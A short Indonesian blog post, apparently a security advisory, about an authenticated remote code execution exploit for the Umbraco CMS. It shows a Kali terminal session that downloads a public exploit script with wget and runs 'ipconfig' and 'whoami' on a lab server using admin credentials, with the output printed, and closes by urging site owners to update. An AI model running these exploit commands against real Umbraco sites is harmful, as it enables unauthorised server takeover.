Umbraco adalah sebuah CMS yang dibangun oleh Microsoft.NET dengan menggunakan bahasa C#. Umbraco banyak digunakan oleh perusahaan sebagai company profile atau pun coorporate website.
Belum lama ini telah di rilis sebuah exploit yang melakukan exploitasi pada Umbraco untuk mendapatkan kerentanan RCE. Dengan kerentanan ini seorang penyerang bisa mendapatkan akses pada server. Akan tetapi untuk melakukan serangan ini pertama kali penyerang harus mendapatkan login dan user yang ada pada website tersebut. Berikut kami lampirkan bagaimana serangan ini dilakukan.
root@kali:/opt/umbraco# wget https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py
root@kali:/opt/umbraco# python3 exploit.py -u admin@umbraco.com -p admin12345 -i 'http://192.168.2.26:88' -c ipconfig
Windows IP Configuration
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::3c14:ffce:2e23:5069%12
IPv4 Address. . . . . . . . . . . : 192.168.2.26
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.2.1
Tunnel adapter isatap.{4D36D658-3FBE-4C9B-995F-00B33E80555D}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
root@kali:/opt/umbraco# python3 exploit.py -u admin@umbraco.com -p admin12345 -i 'http://192.168.2.26:88' -c whoami
iis apppool\umbraco
Apabila anda memiliki Umbraco sebagai salah satu website coorporate ataupun company profile. Ada baiknya anda melakukan update pada website tersebut.
Terima kasih telah membaca artikel ini.